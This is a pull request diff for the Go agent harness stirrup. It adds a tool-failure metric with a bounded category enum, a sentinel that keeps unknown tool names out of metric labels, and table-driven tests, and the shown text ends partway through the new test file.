### PR TITLE
observability: add stirrup.harness.tool_failures counter with bounded category enum

### DIFF
--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -384,22 +384,44 @@ back as a user message. Three implementations ship:
   backend setup.
 
 The `harness/internal/observability/` package emits OTel metrics
-alongside tracing: 12 counters (`stirrup.harness.runs`, `.turns`,
+alongside tracing: 13 counters (`stirrup.harness.runs`, `.turns`,
 `.tokens.input`, `.tokens.output`, `.tool_calls`, `.tool_errors`,
-`.provider.requests`, `.provider.errors`, `.context.compactions`,
-`.security.events`, `.verification.attempts`, `.stalls`), 5
-histograms (run, turn, tool-call duration; provider latency; TTFB),
-and 1 UpDownCounter (context token estimate). All instruments use
-standard attributes (`run.mode`, `provider.type`, `tool.name`).
-`NewNoopMetrics()` provides a zero-cost no-op when metrics are
-disabled.
+`.tool_failures`, `.provider.requests`, `.provider.errors`,
+`.context.compactions`, `.security.events`, `.verification.attempts`,
+`.stalls`), 5 histograms (run, turn, tool-call duration; provider
+latency; TTFB), and 1 UpDownCounter (context token estimate). All
+instruments use standard attributes (`run.mode`, `provider.type`,
+`tool.name`). `NewNoopMetrics()` provides a zero-cost no-op when
+metrics are disabled.
+
+`stirrup.harness.tool_failures` decomposes `.tool_errors` by a
+bounded `category` label drawn from the `ToolFailureCategory` enum
+in `harness/internal/observability/toolfailure.go`. The metric is
+labelled `(provider.type, provider.model, tool.name, category,
+run.mode)` so dashboards can attribute failures to specific model
+selections. Categories cover dispatch-site failures
+(`unknown_tool`, `schema_validation_failed`, `permission_denied`,
+`permission_error`, `security_guard_denied`, `guardrail_denied`,
+`handler_error`, `handler_missing`), async-tool failures
+(`async_preflight_error`, `async_transport_unavailable`,
+`async_timeout`, `async_cancelled`, `async_upstream_error`,
+`async_panic`, `async_internal_error`), provider-side failures
+during tool-bearing turns (`provider_request_failed`,
+`provider_stream_failed`), and stall-detector terminations
+(`stall_repeated_calls`, `stall_consecutive_failures`). The same
+category is co-emitted into `ToolCallTrace.ErrorCategory` on each
+failed `tool_call_record` event so JSONL traces carry the
+identical taxonomy.
 
 Resource attributes (`service.name`, `service.namespace`,
 `deployment.environment`, `service.instance.id`, `harness.run.mode`)
 are built once per process. Stirrup's overlay wins over
 `OTEL_RESOURCE_ATTRIBUTES` on key conflicts. High-cardinality fields
 (`run.id`, `run.provider`, `run.model`) stay at span/instrument level
-to avoid metric series cardinality explosion.
+to avoid metric series cardinality explosion. `tool_failures` keeps
+its label set bounded because `category` is a closed enum and
+`tool.name` is the internal canonical tool identifier (not a raw
+schema path or error fragment).
 
 ## Stall detection
 

--- a/harness/internal/core/dispatch.go
+++ b/harness/internal/core/dispatch.go
@@ -12,6 +12,7 @@ import (
 	oteltrace "go.opentelemetry.io/otel/trace"
 
 	"github.com/rxbynerd/stirrup/harness/internal/guard"
+	"github.com/rxbynerd/stirrup/harness/internal/observability"
 	"github.com/rxbynerd/stirrup/harness/internal/security"
 	"github.com/rxbynerd/stirrup/types"
 )
@@ -31,12 +32,25 @@ type pendingCall struct {
 	success     bool
 	errorReason string // guard-deny reason; written to trace (apply security.Scrub before setting)
 	denied      bool   // PhasePreTool deny path; takes priority over (output, success)
+	// failureCategory is the bounded ToolFailureCategory describing why
+	// this call failed. Always empty when success is true; one of the
+	// observability.ToolFailureCategory enum values otherwise. Read in
+	// Phase 3 to emit the stirrup.harness.tool_failures counter and to
+	// populate ToolCallTrace.ErrorCategory.
+	failureCategory observability.ToolFailureCategory
 }
 
 // planAndDispatch executes the tool calls produced by one assistant turn,
 // preserving the side-effect ordering of the sequential implementation.
 // Sync calls run inline in assistant-message order; async calls fan out
 // under a bounded semaphore sized to cfg.EffectiveToolDispatchMaxParallel().
+//
+// providerType and providerModel are the router's selection for this turn,
+// threaded in so per-call failure metrics can be attributed back to the
+// model that emitted the offending tool_use block. Empty strings are
+// tolerated for callers without a resolved selection (e.g. unit tests of
+// the dispatch path); the metric attributes still emit with empty
+// provider.type / provider.model.
 //
 // Returned values:
 //   - toolResults: results indexed by original call order (always len(toolCalls))
@@ -59,6 +73,8 @@ func (l *AgenticLoop) planAndDispatch(
 	config *types.RunConfig,
 	toolCalls []types.ToolCall,
 	stall *stallDetector,
+	providerType string,
+	providerModel string,
 ) ([]types.ToolResult, []types.ToolCallRecord, string) {
 	plan := make([]pendingCall, len(toolCalls))
 
@@ -119,6 +135,7 @@ func (l *AgenticLoop) planAndDispatch(
 			plan[i].output = blockedToolMessage
 			plan[i].success = false
 			plan[i].errorReason = reason
+			plan[i].failureCategory = observability.ToolFailureGuardrailDenied
 			continue
 		}
 
@@ -133,9 +150,10 @@ func (l *AgenticLoop) planAndDispatch(
 
 		// Sync path: dispatch inline, preserving the sequential code's
 		// behaviour for sync tools (including Unknown).
-		output, success := l.dispatchToolCall(toolSpanCtx, call)
+		output, success, category := l.dispatchToolCallCategorized(toolSpanCtx, call)
 		plan[i].output = output
 		plan[i].success = success
+		plan[i].failureCategory = category
 	}
 
 	// Phase 2: fan out async calls under a bounded semaphore. The cap
@@ -171,6 +189,7 @@ func (l *AgenticLoop) planAndDispatch(
 							security.Scrub(fmt.Sprintf("%v", r)))
 						plan[idx].output = msg
 						plan[idx].success = false
+						plan[idx].failureCategory = observability.ToolFailureAsyncPanic
 						l.Logger.Error(
 							"async tool panic recovered",
 							"tool", plan[idx].call.Name,
@@ -179,9 +198,10 @@ func (l *AgenticLoop) planAndDispatch(
 						)
 					}
 				}()
-				output, success := l.dispatchToolCall(plan[idx].spanCtx, plan[idx].call)
+				output, success, category := l.dispatchToolCallCategorized(plan[idx].spanCtx, plan[idx].call)
 				plan[idx].output = output
 				plan[idx].success = success
+				plan[idx].failureCategory = category
 			}()
 		}
 		// Wait under cancellation: ctx cancellation propagates through
@@ -203,12 +223,28 @@ func (l *AgenticLoop) planAndDispatch(
 		p := &plan[i]
 		callDuration := time.Since(p.startedAt)
 
-		// Span finalisation.
-		p.span.SetAttributes(
+		// Compute the bounded failure category up front: it conditions
+		// both the per-call OTel span attribute set (so trace backends
+		// without JSONL access still see the category) and the
+		// tool_failures metric emission below.
+		errorCategory := ""
+		if !p.success && p.failureCategory.IsValid() {
+			errorCategory = p.failureCategory.String()
+		}
+
+		// Span finalisation. Attributes MUST be set before End() —
+		// OTel SDKs typically drop SetAttributes calls on an already-
+		// ended span — so the failure_category attribute is included
+		// in the same batch as tool.success/duration/output_size.
+		spanAttrs := []attribute.KeyValue{
 			attribute.Bool("tool.success", p.success),
 			attribute.Int("tool.output_size", len(p.output)),
 			attribute.Int64("tool.duration_ms", callDuration.Milliseconds()),
-		)
+		}
+		if errorCategory != "" {
+			spanAttrs = append(spanAttrs, attribute.String("tool.failure_category", errorCategory))
+		}
+		p.span.SetAttributes(spanAttrs...)
 		switch {
 		case p.denied:
 			p.span.SetStatus(codes.Error, "guardrail_denied")
@@ -229,12 +265,13 @@ func (l *AgenticLoop) planAndDispatch(
 			errorReason = security.Scrub(p.output)
 		}
 		l.Trace.RecordToolCall(types.ToolCallTrace{
-			Name:        p.call.Name,
-			DurationMs:  callDuration.Milliseconds(),
-			Success:     p.success,
-			ErrorReason: errorReason,
-			InputSize:   len(p.call.Input),
-			OutputSize:  len(p.output),
+			Name:          p.call.Name,
+			DurationMs:    callDuration.Milliseconds(),
+			Success:       p.success,
+			ErrorReason:   errorReason,
+			InputSize:     len(p.call.Input),
+			OutputSize:    len(p.output),
+			ErrorCategory: errorCategory,
 		})
 
 		toolNameAttr := l.metricAttrs(attribute.String("tool.name", p.call.Name))
@@ -242,6 +279,20 @@ func (l *AgenticLoop) planAndDispatch(
 		l.Metrics.ToolCallDuration.Record(ctx, float64(callDuration.Milliseconds()), toolNameAttr)
 		if !p.success {
 			l.Metrics.ToolErrors.Add(ctx, 1, toolNameAttr)
+			// Failure-category breakdown for dashboards. Validity is
+			// re-checked here so a producer that forgets to set a
+			// category (Success=false with empty category) still bumps
+			// ToolErrors but does not silently widen ToolFailures
+			// label cardinality with an empty string.
+			if p.failureCategory.IsValid() {
+				l.Metrics.ToolFailures.Add(ctx, 1, l.metricAttrs(
+					attribute.String("tool.name", p.call.Name),
+					attribute.String("category", p.failureCategory.String()),
+					attribute.String("provider.type", providerType),
+					attribute.String("provider.model", providerModel),
+					attribute.String("run.mode", config.Mode),
+				))
+			}
 		}
 
 		toolResults[i] = types.ToolResult{
@@ -277,6 +328,28 @@ func (l *AgenticLoop) planAndDispatch(
 			l.Metrics.Stalls.Add(ctx, 1,
 				l.metricAttrs(attribute.String("run.mode", config.Mode)),
 			)
+			// Co-emit stall terminations into the tool-failure series
+			// so dashboards can attribute "run ended via stall" back
+			// to (provider, model, tool, stall-flavour). The stall
+			// detector reports two outcomes: "stalled" for repeated
+			// identical calls and "tool_failures" for consecutive
+			// failures — map each onto its own bounded category.
+			var stallCategory observability.ToolFailureCategory
+			switch outcome {
+			case "stalled":
+				stallCategory = observability.ToolFailureStallRepeated
+			case "tool_failures":
+				stallCategory = observability.ToolFailureStallConsecutiveFailures
+			}
+			if stallCategory.IsValid() {
+				l.Metrics.ToolFailures.Add(ctx, 1, l.metricAttrs(
+					attribute.String("tool.name", p.call.Name),
+					attribute.String("category", stallCategory.String()),
+					attribute.String("provider.type", providerType),
+					attribute.String("provider.model", providerModel),
+					attribute.String("run.mode", config.Mode),
+				))
+			}
 			// Close any spans for calls past the stall point. Phase 2
 			// has already invoked async handlers for these indices, so
 			// the spans are open and would leak if we returned without

--- a/harness/internal/core/dispatch.go
+++ b/harness/internal/core/dispatch.go
@@ -17,6 +17,14 @@ import (
 	"github.com/rxbynerd/stirrup/types"
 )
 
+// unknownToolMetricName is the sentinel substituted for tool.name on
+// every metric emission when a model-supplied tool_use block references
+// a name the registry cannot resolve. The raw name is unbounded
+// (model-controlled, no schema) and MUST NOT be promoted into a TSDB
+// label — see the substitution site in Phase 3 below for the full
+// rationale (CWE-400, cardinality DoS).
+const unknownToolMetricName = "__unknown__"
+
 // pendingCall is the per-tool-call work item carried through the dispatch
 // pipeline. Sync calls populate output/success inline; async calls are
 // mutated by their goroutine and read back by the main routine after the
@@ -92,6 +100,12 @@ func (l *AgenticLoop) planAndDispatch(
 		// would derive from context.Background() and the dispatch
 		// goroutines below would not observe a run-level cancellation
 		// until the per-call DefaultAsyncToolTimeout (60s) expired.
+		// TODO(#229-followup): the span name uses the raw call.Name
+		// before tool resolution, so an unknown-tool span carries a
+		// model-controlled name. Lower-blast-radius than the metric
+		// label substitution below (per-span storage, not a persistent
+		// TSDB key) so deferred to a follow-up issue rather than
+		// reworking the span lifecycle here.
 		_, toolSpan := l.Tracer.Start(l.traceCtx(ctx), "tool."+call.Name,
 			oteltrace.WithAttributes(
 				attribute.String("tool.name", call.Name),
@@ -274,7 +288,19 @@ func (l *AgenticLoop) planAndDispatch(
 			ErrorCategory: errorCategory,
 		})
 
-		toolNameAttr := l.metricAttrs(attribute.String("tool.name", p.call.Name))
+		// Sentinel substitution for the unknown_tool path: p.call.Name
+		// is model-supplied and unbounded when no registry entry
+		// resolves, so it MUST NOT flow into a TSDB label. An attacker-
+		// or malfunctioning-model loop emitting tool_use blocks with
+		// high-entropy unique names would create O(n) unique
+		// timeseries on stirrup.harness.tool_{calls,errors,failures,
+		// call_duration} (CWE-400). Trace records (ErrorReason,
+		// ToolCallTrace.Name above) retain the raw name for debugging.
+		metricToolName := p.call.Name
+		if p.failureCategory == observability.ToolFailureUnknownTool {
+			metricToolName = unknownToolMetricName
+		}
+		toolNameAttr := l.metricAttrs(attribute.String("tool.name", metricToolName))
 		l.Metrics.ToolCalls.Add(ctx, 1, toolNameAttr)
 		l.Metrics.ToolCallDuration.Record(ctx, float64(callDuration.Milliseconds()), toolNameAttr)
 		if !p.success {
@@ -286,7 +312,7 @@ func (l *AgenticLoop) planAndDispatch(
 			// label cardinality with an empty string.
 			if p.failureCategory.IsValid() {
 				l.Metrics.ToolFailures.Add(ctx, 1, l.metricAttrs(
-					attribute.String("tool.name", p.call.Name),
+					attribute.String("tool.name", metricToolName),
 					attribute.String("category", p.failureCategory.String()),
 					attribute.String("provider.type", providerType),
 					attribute.String("provider.model", providerModel),
@@ -342,8 +368,12 @@ func (l *AgenticLoop) planAndDispatch(
 				stallCategory = observability.ToolFailureStallConsecutiveFailures
 			}
 			if stallCategory.IsValid() {
+				// metricToolName carries the unknown_tool sentinel
+				// substitution applied above; reuse it so a stall
+				// triggered by repeated unknown-tool calls does not
+				// re-introduce the unbounded label.
 				l.Metrics.ToolFailures.Add(ctx, 1, l.metricAttrs(
-					attribute.String("tool.name", p.call.Name),
+					attribute.String("tool.name", metricToolName),
 					attribute.String("category", stallCategory.String()),
 					attribute.String("provider.type", providerType),
 					attribute.String("provider.model", providerModel),

--- a/harness/internal/core/dispatch_parallel_test.go
+++ b/harness/internal/core/dispatch_parallel_test.go
@@ -156,7 +156,7 @@ func TestParallelDispatch_FiveConcurrent_CompleteInMaxNotSum(t *testing.T) {
 	}
 
 	start := time.Now()
-	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{})
+	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{}, "", "")
 	elapsed := time.Since(start)
 
 	if outcome != "" {
@@ -200,7 +200,7 @@ func TestParallelDispatch_OutOfOrderResolution_PreservesCallOrder(t *testing.T) 
 	go fireResponseWhenEmitted(t, tr, calls[1].ID, 0, "payload-for-second")
 	go fireResponseWhenEmitted(t, tr, calls[0].ID, 50*time.Millisecond, "payload-for-first")
 
-	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{})
+	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{}, "", "")
 	if outcome != "" {
 		t.Fatalf("unexpected stall outcome: %q", outcome)
 	}
@@ -284,7 +284,7 @@ func TestParallelDispatch_MaxParallelOne_Serialises(t *testing.T) {
 		}()
 	}
 
-	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{})
+	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{}, "", "")
 	if outcome != "" {
 		t.Fatalf("unexpected stall outcome: %q", outcome)
 	}
@@ -355,7 +355,7 @@ func TestParallelDispatch_CtxCancellation_DrainsInFlight(t *testing.T) {
 	}()
 
 	start := time.Now()
-	results, _, outcome := loop.planAndDispatch(ctx, config, calls, &stallDetector{})
+	results, _, outcome := loop.planAndDispatch(ctx, config, calls, &stallDetector{}, "", "")
 	elapsed := time.Since(start)
 
 	if outcome != "" {
@@ -443,7 +443,7 @@ func TestParallelDispatch_MixedSyncAndAsync_DispatchesSyncInline(t *testing.T) {
 	go fireResponseWhenEmitted(t, tr, calls[1].ID, 0, "async-result-0")
 	go fireResponseWhenEmitted(t, tr, calls[3].ID, 0, "async-result-1")
 
-	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{})
+	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{}, "", "")
 	if outcome != "" {
 		t.Fatalf("unexpected stall outcome: %q", outcome)
 	}
@@ -521,7 +521,7 @@ func TestParallelDispatch_PanicInOneHandler_DoesNotStopOthers(t *testing.T) {
 
 	go fireResponseWhenEmitted(t, tr, calls[1].ID, 20*time.Millisecond, "good-result")
 
-	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{})
+	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{}, "", "")
 	if outcome != "" {
 		t.Fatalf("unexpected stall outcome: %q", outcome)
 	}
@@ -592,7 +592,7 @@ func TestParallelDispatch_StallDetector_ObservesCallOrder(t *testing.T) {
 	go fireResponseWhenEmitted(t, tr, calls[0].ID, 60*time.Millisecond, "r0")
 
 	stall := &stallDetector{}
-	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, stall)
+	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, stall, "", "")
 	if outcome != "" {
 		t.Fatalf("unexpected stall outcome %q: two identical calls + one different should not trip threshold=3", outcome)
 	}
@@ -645,7 +645,7 @@ func TestParallelDispatch_OTelSpans_AreSiblingsUnderTurn(t *testing.T) {
 	go fireResponseWhenEmitted(t, tr, calls[0].ID, 50*time.Millisecond, "r0")
 	go fireResponseWhenEmitted(t, tr, calls[1].ID, 50*time.Millisecond, "r1")
 
-	results, _, outcome := loop.planAndDispatch(turnCtx, config, calls, &stallDetector{})
+	results, _, outcome := loop.planAndDispatch(turnCtx, config, calls, &stallDetector{}, "", "")
 	turnSpan.End()
 	if outcome != "" {
 		t.Fatalf("unexpected stall outcome: %q", outcome)
@@ -737,7 +737,7 @@ func TestParallelDispatch_StallTrips_ClosesRemainingSpans(t *testing.T) {
 			fmt.Sprintf("result-%d", i))
 	}
 
-	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{})
+	results, _, outcome := loop.planAndDispatch(context.Background(), config, calls, &stallDetector{}, "", "")
 	if outcome != "stalled" {
 		t.Fatalf("expected outcome 'stalled', got %q", outcome)
 	}
@@ -794,7 +794,7 @@ func TestParallelDispatch_GuardDenyReason_ScrubbedBeforeTrace(t *testing.T) {
 	}
 
 	results, _, outcome := loop.planAndDispatch(context.Background(),
-		configWithMaxParallel(1), calls, &stallDetector{})
+		configWithMaxParallel(1), calls, &stallDetector{}, "", "")
 	if outcome != "" {
 		t.Fatalf("unexpected stall outcome: %q", outcome)
 	}

--- a/harness/internal/core/loop.go
+++ b/harness/internal/core/loop.go
@@ -14,6 +14,7 @@ import (
 
 	contextpkg "github.com/rxbynerd/stirrup/harness/internal/context"
 	"github.com/rxbynerd/stirrup/harness/internal/guard"
+	"github.com/rxbynerd/stirrup/harness/internal/observability"
 	"github.com/rxbynerd/stirrup/harness/internal/prompt"
 	"github.com/rxbynerd/stirrup/harness/internal/router"
 	"github.com/rxbynerd/stirrup/harness/internal/security"
@@ -654,6 +655,20 @@ func (l *AgenticLoop) runInnerLoop(
 			}
 			// Rollback: don't append anything on error.
 			l.Metrics.ProviderErrors.Add(ctx, 1, providerAttrs)
+			// Co-emit into the tool-failure series when the failed
+			// request carried tool definitions: from the model's
+			// perspective the harness asked it to use tools and the
+			// provider refused. A pure text-only request error is a
+			// provider failure but not a tool-use failure.
+			if len(toolDefs) > 0 {
+				l.Metrics.ToolFailures.Add(ctx, 1, l.metricAttrs(
+					attribute.String("tool.name", ""),
+					attribute.String("category", observability.ToolFailureProviderRequest.String()),
+					attribute.String("provider.type", selection.Provider),
+					attribute.String("provider.model", selection.Model),
+					attribute.String("run.mode", config.Mode),
+				))
+			}
 			turnMode, turnBatchID := turnModeInfo(selectedProvider)
 			l.Trace.RecordTurn(types.TurnTrace{
 				Turn:       turn,
@@ -699,6 +714,21 @@ func (l *AgenticLoop) runInnerLoop(
 			}
 			// Rollback on stream error — don't append partial content.
 			l.Metrics.ProviderErrors.Add(ctx, 1, providerAttrs)
+			// Co-emit into the tool-failure series when this turn had
+			// tools attached: mid-stream parser/disconnect failures
+			// abort tool-call assembly. Distinguished from
+			// provider_request_failed by the category — a failure
+			// after the stream opened is a stream-side fault, not a
+			// rejected request.
+			if len(toolDefs) > 0 {
+				l.Metrics.ToolFailures.Add(ctx, 1, l.metricAttrs(
+					attribute.String("tool.name", ""),
+					attribute.String("category", observability.ToolFailureProviderStream.String()),
+					attribute.String("provider.type", selection.Provider),
+					attribute.String("provider.model", selection.Model),
+					attribute.String("run.mode", config.Mode),
+				))
+			}
 			turnMode, turnBatchID := turnModeInfo(selectedProvider)
 			l.Trace.RecordTurn(types.TurnTrace{
 				Turn:       turn,
@@ -843,7 +873,10 @@ func (l *AgenticLoop) runInnerLoop(
 		// config.EffectiveToolDispatchMaxParallel(). planAndDispatch preserves
 		// result order, stall-detector ordering, per-call timeouts, and ctx
 		// cancellation propagation; see harness/internal/core/dispatch.go.
-		toolResults, toolRecords, stallOutcome := l.planAndDispatch(ctx, config, toolCalls, stall)
+		// The router's provider/model selection is forwarded so per-call
+		// failure metrics (stirrup.harness.tool_failures) can be attributed
+		// back to the model that emitted the offending tool_use block.
+		toolResults, toolRecords, stallOutcome := l.planAndDispatch(ctx, config, toolCalls, stall, selection.Provider, selection.Model)
 		turnRecord.ToolCalls = toolRecords
 		l.Trace.RecordTurnRecord(turnRecord)
 		messages = appendToolResults(messages, toolResults)

--- a/harness/internal/core/tool_failure_metrics_test.go
+++ b/harness/internal/core/tool_failure_metrics_test.go
@@ -1,0 +1,667 @@
+package core
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"errors"
+	"log/slog"
+	"testing"
+
+	sdkmetric "go.opentelemetry.io/otel/sdk/metric"
+	"go.opentelemetry.io/otel/sdk/metric/metricdata"
+	"go.opentelemetry.io/otel/trace/noop"
+
+	contextpkg "github.com/rxbynerd/stirrup/harness/internal/context"
+	"github.com/rxbynerd/stirrup/harness/internal/edit"
+	"github.com/rxbynerd/stirrup/harness/internal/git"
+	"github.com/rxbynerd/stirrup/harness/internal/guard"
+	"github.com/rxbynerd/stirrup/harness/internal/observability"
+	"github.com/rxbynerd/stirrup/harness/internal/permission"
+	"github.com/rxbynerd/stirrup/harness/internal/prompt"
+	"github.com/rxbynerd/stirrup/harness/internal/router"
+	"github.com/rxbynerd/stirrup/harness/internal/tool"
+	"github.com/rxbynerd/stirrup/harness/internal/trace"
+	"github.com/rxbynerd/stirrup/harness/internal/transport"
+	"github.com/rxbynerd/stirrup/harness/internal/verifier"
+	"github.com/rxbynerd/stirrup/types"
+)
+
+// denyPolicy is a PermissionPolicy that always denies. Drives the
+// permission_denied category test without depending on Cedar wiring.
+type denyPolicy struct{}
+
+func (denyPolicy) Check(_ context.Context, _ types.ToolDefinition, _ json.RawMessage) (*permission.PermissionResult, error) {
+	return &permission.PermissionResult{Allowed: false, Reason: "test deny"}, nil
+}
+
+// errorPolicy is a PermissionPolicy whose Check always returns an error.
+// Drives the permission_error category test.
+type errorPolicy struct{}
+
+func (errorPolicy) Check(_ context.Context, _ types.ToolDefinition, _ json.RawMessage) (*permission.PermissionResult, error) {
+	return nil, errors.New("upstream ask disconnected")
+}
+
+// buildMetricsHarness returns a loop wired up with a manual-reader-backed
+// metric provider so tests can assert on stirrup.harness.tool_failures
+// observations after a planAndDispatch call. The returned reader's
+// Collect method snapshots the current metric state.
+//
+// Pass tr=nil to use NullTransport (sufficient for sync tools and
+// preflight-failing async tools where the transport never matters);
+// pass an asyncTestTransport when the test needs a live control plane
+// to round-trip tool_result_request/response (only the
+// async_preflight_error test currently needs this distinction).
+func buildMetricsHarness(t *testing.T, tools []*tool.Tool, perm permission.PermissionPolicy, gr guard.GuardRail, tr transport.Transport) (*AgenticLoop, *sdkmetric.ManualReader) {
+	t.Helper()
+	reader := sdkmetric.NewManualReader()
+	mp := sdkmetric.NewMeterProvider(sdkmetric.WithReader(reader))
+	metrics, err := observability.NewMetricsForTesting(mp)
+	if err != nil {
+		t.Fatalf("NewMetricsForTesting: %v", err)
+	}
+	registry := tool.NewRegistry()
+	for _, tl := range tools {
+		registry.Register(tl)
+	}
+	if perm == nil {
+		perm = permission.NewAllowAll()
+	}
+	if tr == nil {
+		tr = transport.NewNullTransport()
+	}
+	loop := &AgenticLoop{
+		Provider:     nil,
+		Router:       router.NewStaticRouter("anthropic", "claude-sonnet-4-6"),
+		Prompt:       prompt.NewDefaultPromptBuilder(),
+		Context:      contextpkg.NewSlidingWindowStrategy(),
+		Tools:        registry,
+		Edit:         edit.NewWholeFileStrategy(),
+		Verifier:     verifier.NewNoneVerifier(),
+		Permissions:  perm,
+		Git:          git.NewNoneGitStrategy(),
+		GuardRail:    gr,
+		Transport:    tr,
+		Trace:        trace.NewJSONLTraceEmitter(&bytes.Buffer{}),
+		Tracer:       noop.NewTracerProvider().Tracer(""),
+		TraceContext: context.Background(),
+		Metrics:      metrics,
+		Logger:       slog.New(slog.NewJSONHandler(&bytes.Buffer{}, nil)),
+	}
+	return loop, reader
+}
+
+// failureDataPoint is a typed view of one stirrup.harness.tool_failures
+// observation: its value and the label set the metric was recorded with.
+type failureDataPoint struct {
+	value    int64
+	tool     string
+	category string
+	provider string
+	model    string
+	mode     string
+}
+
+// collectFailures pulls every observation of the
+// stirrup.harness.tool_failures counter from the manual reader and
+// projects them onto a flat slice keyed by label values. Returns an
+// empty slice when the counter has no observations.
+func collectFailures(t *testing.T, reader *sdkmetric.ManualReader) []failureDataPoint {
+	t.Helper()
+	var rm metricdata.ResourceMetrics
+	if err := reader.Collect(context.Background(), &rm); err != nil {
+		t.Fatalf("Collect: %v", err)
+	}
+	var out []failureDataPoint
+	for _, sm := range rm.ScopeMetrics {
+		for _, m := range sm.Metrics {
+			if m.Name != "stirrup.harness.tool_failures" {
+				continue
+			}
+			sum, ok := m.Data.(metricdata.Sum[int64])
+			if !ok {
+				t.Fatalf("expected Sum[int64] for tool_failures, got %T", m.Data)
+			}
+			for _, dp := range sum.DataPoints {
+				fp := failureDataPoint{value: dp.Value}
+				for _, kv := range dp.Attributes.ToSlice() {
+					switch string(kv.Key) {
+					case "tool.name":
+						fp.tool = kv.Value.Emit()
+					case "category":
+						fp.category = kv.Value.Emit()
+					case "provider.type":
+						fp.provider = kv.Value.Emit()
+					case "provider.model":
+						fp.model = kv.Value.Emit()
+					case "run.mode":
+						fp.mode = kv.Value.Emit()
+					}
+				}
+				out = append(out, fp)
+			}
+		}
+	}
+	return out
+}
+
+// schemaTool is a sync tool with a required field so we can drive the
+// schema_validation_failed category by submitting an empty input.
+func schemaTool() *tool.Tool {
+	return &tool.Tool{
+		Name:        "needs_path",
+		Description: "tool whose schema requires 'path'",
+		InputSchema: json.RawMessage(`{"type":"object","properties":{"path":{"type":"string"}},"required":["path"]}`),
+		Handler: func(_ context.Context, _ json.RawMessage) (string, error) {
+			return "ok", nil
+		},
+	}
+}
+
+// trivialTool is a sync tool with a permissive schema that always
+// succeeds. Used as the baseline against which success-vs-failure
+// emissions can be compared.
+func trivialTool() *tool.Tool {
+	return &tool.Tool{
+		Name:        "trivial",
+		Description: "always-OK sync tool",
+		InputSchema: json.RawMessage(`{"type":"object","properties":{}}`),
+		Handler: func(_ context.Context, _ json.RawMessage) (string, error) {
+			return "ok", nil
+		},
+	}
+}
+
+// erroringTool is a sync tool whose Handler returns an error every time.
+// Drives the handler_error category test.
+func erroringTool() *tool.Tool {
+	return &tool.Tool{
+		Name:        "explode",
+		Description: "always-error sync tool",
+		InputSchema: json.RawMessage(`{"type":"object","properties":{}}`),
+		Handler: func(_ context.Context, _ json.RawMessage) (string, error) {
+			return "", errors.New("kaboom")
+		},
+	}
+}
+
+// mutatingTool is workspace-mutating so the permission gate fires for it.
+func mutatingTool() *tool.Tool {
+	return &tool.Tool{
+		Name:              "write_something",
+		Description:       "mutating tool",
+		InputSchema:       json.RawMessage(`{"type":"object","properties":{}}`),
+		WorkspaceMutating: true,
+		Handler: func(_ context.Context, _ json.RawMessage) (string, error) {
+			return "wrote", nil
+		},
+	}
+}
+
+// asyncPreflightFailingTool returns an AsyncHandler that errors before
+// the loop emits tool_result_request. Drives the
+// async_preflight_error category test.
+func asyncPreflightFailingTool() *tool.Tool {
+	return &tool.Tool{
+		Name:        "async_broken",
+		Description: "async tool whose preflight always fails",
+		InputSchema: json.RawMessage(`{"type":"object","properties":{}}`),
+		AsyncHandler: func(_ context.Context, _ json.RawMessage) (tool.AsyncDispatch, error) {
+			return tool.AsyncDispatch{}, errors.New("preflight fail")
+		},
+	}
+}
+
+// TestToolFailureMetrics_TableDriven verifies that each
+// dispatch-site failure category emits the
+// stirrup.harness.tool_failures counter with the correct (tool.name,
+// category, provider.type, provider.model, run.mode) label set.
+//
+// One row per category that can fire from dispatchToolCallCategorized
+// or planAndDispatch's pre-dispatch guard check.
+func TestToolFailureMetrics_TableDriven(t *testing.T) {
+	const (
+		wantProvider = "anthropic"
+		wantModel    = "claude-sonnet-4-6"
+		wantMode     = "execution"
+	)
+	cases := []struct {
+		name         string
+		tools        []*tool.Tool
+		perm         permission.PermissionPolicy
+		guard        guard.GuardRail
+		transport    transport.Transport
+		call         types.ToolCall
+		wantTool     string
+		wantCategory observability.ToolFailureCategory
+	}{
+		{
+			name:         "unknown_tool",
+			tools:        []*tool.Tool{trivialTool()},
+			call:         types.ToolCall{ID: "tc1", Name: "does_not_exist", Input: json.RawMessage(`{}`)},
+			wantTool:     "does_not_exist",
+			wantCategory: observability.ToolFailureUnknownTool,
+		},
+		{
+			name:         "schema_validation_failed",
+			tools:        []*tool.Tool{schemaTool()},
+			call:         types.ToolCall{ID: "tc2", Name: "needs_path", Input: json.RawMessage(`{}`)},
+			wantTool:     "needs_path",
+			wantCategory: observability.ToolFailureSchemaValidation,
+		},
+		{
+			name:         "handler_error",
+			tools:        []*tool.Tool{erroringTool()},
+			call:         types.ToolCall{ID: "tc3", Name: "explode", Input: json.RawMessage(`{}`)},
+			wantTool:     "explode",
+			wantCategory: observability.ToolFailureHandlerError,
+		},
+		{
+			name:         "permission_denied",
+			tools:        []*tool.Tool{mutatingTool()},
+			perm:         denyPolicy{},
+			call:         types.ToolCall{ID: "tc4", Name: "write_something", Input: json.RawMessage(`{}`)},
+			wantTool:     "write_something",
+			wantCategory: observability.ToolFailurePermissionDenied,
+		},
+		{
+			name:         "permission_error",
+			tools:        []*tool.Tool{mutatingTool()},
+			perm:         errorPolicy{},
+			call:         types.ToolCall{ID: "tc5", Name: "write_something", Input: json.RawMessage(`{}`)},
+			wantTool:     "write_something",
+			wantCategory: observability.ToolFailurePermissionError,
+		},
+		{
+			name:         "guardrail_denied",
+			tools:        []*tool.Tool{trivialTool()},
+			guard:        &stubDenyGuardRail{reason: "blocked"},
+			call:         types.ToolCall{ID: "tc6", Name: "trivial", Input: json.RawMessage(`{}`)},
